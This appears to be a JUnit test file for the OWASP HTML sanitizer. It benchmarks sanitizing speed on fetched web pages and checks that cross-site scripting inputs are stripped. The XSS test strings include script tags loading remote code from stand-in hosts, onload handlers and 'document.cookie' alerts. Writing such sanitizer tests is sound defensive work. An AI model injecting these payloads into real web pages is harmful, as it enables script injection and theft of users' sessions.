1afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com/*
2afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Copyright (c) 2007-2010, Arshan Dabirsiaghi, Jason Li
30f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
4afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * All rights reserved.
50f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
6afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
70f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
8afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
9afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
10afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * Neither the name of OWASP nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
11afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com *
12afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
13afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
14afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
15afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
16afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
17afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
18afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
19afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
20afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
21afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
22afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
23afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com */
24afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
25afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.compackage org.owasp.html;
26afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
270f3a7565157c70edb1935f04888fdc0407397fabmikesamuelimport java.io.IOException;
28afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport java.io.InputStreamReader;
29afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport java.net.URL;
300f3a7565157c70edb1935f04888fdc0407397fabmikesamuelimport java.net.URLConnection;
31d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuelimport java.util.regex.Matcher;
32afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport java.util.regex.Pattern;
33afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
340f3a7565157c70edb1935f04888fdc0407397fabmikesamuelimport org.apache.commons.codec.binary.Base64;
35afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
360f3a7565157c70edb1935f04888fdc0407397fabmikesamuelimport junit.framework.AssertionFailedError;
37afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport junit.framework.Test;
38afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport junit.framework.TestCase;
39afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.comimport junit.framework.TestSuite;
40afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
414e867904c8295537803c1c8a076e130df5674b58mikesamuel
42afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com/**
43afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * This class tests AntiSamy functionality and the basic policy file which
44afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * should be immune to XSS and CSS phishing attacks.
450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
46afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com * @author Arshan Dabirsiaghi
470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel *
48afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com */
49afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.compublic class AntiSamyTest extends TestCase {
50afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  static final boolean RUN_KNOWN_FAILURES = false;
52036155387b0beda0993f361b73b020b773e58708mikesamuel  static final boolean DISABLE_INTERNETS = false;
530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
544e867904c8295537803c1c8a076e130df5674b58mikesamuel  private static HtmlSanitizer.Policy makePolicy(Appendable buffer) {
550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    final HtmlStreamRenderer renderer = HtmlStreamRenderer.create(
560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        buffer,
570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        new Handler<IOException>() {
580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          public void handle(IOException ex) {
590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            AssertionFailedError failure = new AssertionFailedError();
600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            failure.initCause(ex);
610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            throw failure;
620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          }
630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        },
640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        new Handler<String>() {
650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          public void handle(String errorMessage) {
660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            fail(errorMessage);
670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          }
680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        });
690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
704e867904c8295537803c1c8a076e130df5674b58mikesamuel    return new HtmlPolicyBuilder()
714e867904c8295537803c1c8a076e130df5674b58mikesamuel        .allowElements(
724e867904c8295537803c1c8a076e130df5674b58mikesamuel            "a", "b", "br", "div", "font", "i", "img", "input", "li",
734e867904c8295537803c1c8a076e130df5674b58mikesamuel            "ol", "p", "span", "td", "ul")
74846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("checked", "type").onElements("input")
75846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("color").onElements("font")
76846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("href").onElements("a")
77846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("src").onElements("img")
78846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("class", "id", "title").globally()
79846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel        .allowAttributes("char").matching(
804e867904c8295537803c1c8a076e130df5674b58mikesamuel            new AttributePolicy() {
814e867904c8295537803c1c8a076e130df5674b58mikesamuel              public String apply(
824e867904c8295537803c1c8a076e130df5674b58mikesamuel                  String elementName, String attributeName, String value) {
834e867904c8295537803c1c8a076e130df5674b58mikesamuel                return value.length() == 1 ? value : null;
840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel              }
85846d5d0377617bd20ac271a486f07bfe757cc7a2mikesamuel            }).onElements("td")
864e867904c8295537803c1c8a076e130df5674b58mikesamuel        .allowStandardUrlProtocols()
874e867904c8295537803c1c8a076e130df5674b58mikesamuel        .requireRelNofollowOnLinks()
884e867904c8295537803c1c8a076e130df5674b58mikesamuel        .allowStyling()
894e867904c8295537803c1c8a076e130df5674b58mikesamuel        .build(renderer);
900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
924e867904c8295537803c1c8a076e130df5674b58mikesamuel  private static String sanitize(String html) {
930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    StringBuilder sb = new StringBuilder();
940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
954e867904c8295537803c1c8a076e130df5674b58mikesamuel    HtmlSanitizer.sanitize(html, makePolicy(sb));
960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    return sb.toString();
980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  private static final String[] BASE64_BAD_XML_STRINGS = new String[] {
1010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // first string is
1020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // "<a - href=\"http://www.owasp.org\">click here</a>"
1030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "PGEgLSBocmVmPSJodHRwOi8vd3d3Lm93YXNwLm9yZyI+Y2xpY2sgaGVyZTwvYT4=",
1040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // the rest are randomly generated 300 byte sequences which generate
1050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // parser errors, turned into Strings
1060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "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",
1120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "mqBEVbNnL929CUA3sjkOmPB5dL0/a0spq8LgbIsJa22SfP580XduzUIKnCtdeC9TjPB/GEPp/LvEUFaLTUgPDQQGu3H5UCZyjVTAMHl45me/0qISEf903zFFqW5Lk3TS6iPrithqMMvhdK29Eg5OhhcoHS+ALpn0EjzUe86NywuFNb6ID4o8aF/ztZlKJegnpDAm3JuhCBauJ+0gcOB8GNdWd5a06qkokmwk1tgwWat7cQGFIH1NOvBwRMKhD51MJ7V28806a3zkOVwwhOiyyTXR+EcDA/aq5acX0yailLWB82g/2GR/DiaqNtusV+gpcMTNYemEv3c/xLkClJc29DSfTsJGKsmIDMqeBMM7RRBNinNAriY9iNX1UuHZLr/tUrRNrfuNT5CvvK1K",
1130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "IMcfbWZ/iCa/LDcvMlk6LEJ0gDe4ohy2Vi0pVBd9aqR5PnRj8zGit8G2rLuNUkDmQ95bMURasmaPw2Xjf6SQjRk8coIHDLtbg/YNQVMabE8pKd6EaFdsGWJkcFoonxhPR29aH0xvjC4Mp3cJX3mjqyVsOp9xdk6d0Y2hzV3W/oPCq0DV03pm7P3+jH2OzoVVIDYgG1FD12S03otJrCXuzDmE2LOQ0xwgBQ9sREBLXwQzUKfXH8ogZzjdR19pX9qe0rRKMNz8k5lqcF9R2z+XIS1QAfeV9xopXA0CeyrhtoOkXV2i8kBxyodDp7tIeOvbEfvaqZGJgaJyV8UMTDi7zjwNeVdyKa8USH7zrXSoCl+Ud5eflI9vxKS+u9Bt1ufBHJtULOCHGA2vimkU",
1140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "AqC2sr44HVueGzgW13zHvJkqOEBWA8XA66ZEb3EoL1ehypSnJ07cFoWZlO8kf3k57L1fuHFWJ6quEdLXQaT9SJKHlUaYQvanvjbBlqWwaH3hODNsBGoK0DatpoQ+FxcSkdVE/ki3rbEUuJiZzU0BnDxH+Q6FiNsBaJuwau29w24MlD28ELJsjCcUVwtTQkaNtUxIlFKHLj0++T+IVrQH8KZlmVLvDefJ6llWbrFNVuh674HfKr/GEUatG6KI4gWNtGKKRYh76mMl5xH5qDfBZqxyRaKylJaDIYbx5xP5I4DDm4gOnxH+h/Pu6dq6FJ/U3eDio/KQ9xwFqTuyjH0BIRBsvWWgbTNURVBheq+am92YBhkj1QmdKTxQ9fQM55O8DpyWzRhky0NevM9j",
1150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "qkFfS3WfLyj3QTQT9i/s57uOPQCTN1jrab8bwxaxyeYUlz2tEtYyKGGUufua8WzdBT2VvWTvH0JkK0LfUJ+vChvcnMFna+tEaCKCFMIOWMLYVZSJDcYMIqaIr8d0Bi2bpbVf5z4WNma0pbCKaXpkYgeg1Sb8HpKG0p0fAez7Q/QRASlvyM5vuIOH8/CM4fF5Ga6aWkTRG0lfxiyeZ2vi3q7uNmsZF490J79r/6tnPPXIIC4XGnijwho5NmhZG0XcQeyW5KnT7VmGACFdTHOb9oS5WxZZU29/oZ5Y23rBBoSDX/xZ1LNFiZk6Xfl4ih207jzogv+3nOro93JHQydNeKEwxOtbKqEe7WWJLDw/EzVdJTODrhBYKbjUce10XsavuiTvv+H1Qh4lo2Vx",
1160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "O900/Gn82AjyLYqiWZ4ILXBBv/ZaXpTpQL0p9nv7gwF2MWsS2OWEImcVDa+1ElrjUumG6CVEv/rvax53krqJJDg+4Z/XcHxv58w6hNrXiWqFNjxlu5RZHvj1oQQXnS2n8qw8e/c+8ea2TiDIVr4OmgZz1G9uSPBeOZJvySqdgNPMpgfjZwkL2ez9/x31sLuQxi/FW3DFXU6kGSUjaq8g/iGXlaaAcQ0t9Gy+y005Z9wpr2JWWzishL+1JZp9D4SY/r3NHDphN4MNdLHMNBRPSIgfsaSqfLraIt+zWIycsd+nksVxtPv9wcyXy51E1qlHr6Uygz2VZYD9q9zyxEX4wRP2VEewHYUomL9d1F6gGG5fN3z82bQ4hI9uDirWhneWazUOQBRud5otPOm9",
1170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    "C3c+d5Q9lyTafPLdelG1TKaLFinw1TOjyI6KkrQyHKkttfnO58WFvScl1TiRcB/iHxKahskoE2+VRLUIhctuDU4sUvQh/g9Arw0LAA4QTxuLFt01XYdigurz4FT15ox2oDGGGrRb3VGjDTXK1OWVJoLMW95EVqyMc9F+Fdej85LHE+8WesIfacjUQtTG1tzYVQTfubZq0+qxXws8QrxMLFtVE38tbeXo+Ok1/U5TUa6FjWflEfvKY3XVcl8RKkXua7fVz/Blj8Gh+dWe2cOxa0lpM75ZHyz9adQrB2Pb4571E4u2xI5un0R0MFJZBQuPDc1G5rPhyk+Hb4LRG3dS0m8IASQUOskv93z978L1+Abu9CLP6d6s5p+BzWxhMUqwQXC/CCpTywrkJ0RG",
1180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  };
1190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  @Override
1210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  protected void setUp() throws Exception {
1220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    super.setUp();
1230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
1240f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  @Override
1260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  protected void tearDown() throws Exception {
1270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    super.tearDown();
1280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
1290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public static Test suite() {
1310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    TestSuite suite = new TestSuite(AntiSamyTest.class);
1320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    return suite;
1330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
1340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testCompareSpeeds() throws Exception {
13671e338dfcc6a93fa5b28c53270e618f6235bba88mikesamuel    if (DISABLE_INTERNETS) { return; }
137c517d7c6cadcd8643d565783464a2728be8c08d9mikesamuel
1386d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel    long totalTime = 0;
1396d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel    long averageTime = 0;
1400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    int testReps = 15;
1420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    for (String url : new String[] {
1440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            "http://slashdot.org/", "http://www.fark.com/",
1450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            "http://www.cnn.com/", "http://google.com/",
1460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            "http://www.microsoft.com/en/us/default.aspx",
1470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel            "http://deadspin.com/",
1480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        }) {
1490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      URLConnection conn = new URL(url).openConnection();
150d9475f7aaf4b2d9f95e815869680fff9a0474fd6mikesamuel      String ct = guessCharsetFromContentType(conn.getContentType());
151489a0ec7301a86af8497d24748336db09ca278damikesamuel      InputStreamReader in = new InputStreamReader(conn.getInputStream(), ct);
1520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      StringBuilder out = new StringBuilder();
1530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      char[] buffer = new char[5000];
1540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      int read = 0;
1550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      do {
1560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        read = in.read(buffer, 0, buffer.length);
1570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        if (read > 0) {
1580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel          out.append(buffer, 0, read);
1590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        }
1600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      } while (read >= 0);
1610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      in.close();
1630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String html = out.toString();
1650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      System.out.println("About to scan: " + url + " size: " + html.length());
1670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      if (html.length() > 640000) {
1680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        System.out.println("   -Maximum input size 640000 exceeded. SKIPPING.");
1690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        continue;
1700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
1710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1726d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel      long startTime = 0;
1736d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel      long endTime = 0;
1740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      for (int j = 0; j < testReps; j++) {
1766d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel        startTime = System.nanoTime();
1770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sanitize(html);
1786d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel        endTime = System.nanoTime();
1790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1806d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel        System.out.println(
1816d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel            "    Took " + ((endTime - startTime) / 1000000) + " ms");
1820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        totalTime = totalTime + (endTime - startTime);
1830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
1840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      averageTime = totalTime / testReps;
1860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
1870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1886d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel    System.out.println("Total time ms: " + totalTime/1000000L);
1896d8c2e9241d042a3e0bff40dac4c388966ad060cmikesamuel    System.out.println("Average time per rep ms: " + averageTime/1000000L);
1900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
1910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
1920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  /*
1930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * Test basic XSS cases.
1940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   */
195afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
1960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testScriptAttacks() throws Exception {
1970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("test<script>alert(document.cookie)</script>", "script");
1980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("test<script>alert(document.cookie)</script>", "script");
1990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
2000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<<<><<script src=http://fake-evil.ru/test.js>", "<script");
2010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<<<><<script src=http://fake-evil.ru/test.js>", "<script");
2020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
2030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<script<script src=http://fake-evil.ru/test.js>>", "<script");
2040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<script<script src=http://fake-evil.ru/test.js>>", "<script");
205afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
2070f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
208afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "onload");
2100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "onload");
211afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BODY ONLOAD=alert('XSS')>", "alert");
2130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BODY ONLOAD=alert('XSS')>", "alert");
214afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<iframe src=http://ha.ckers.org/scriptlet.html <", "<iframe");
2160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<iframe src=http://ha.ckers.org/scriptlet.html <", "<iframe");
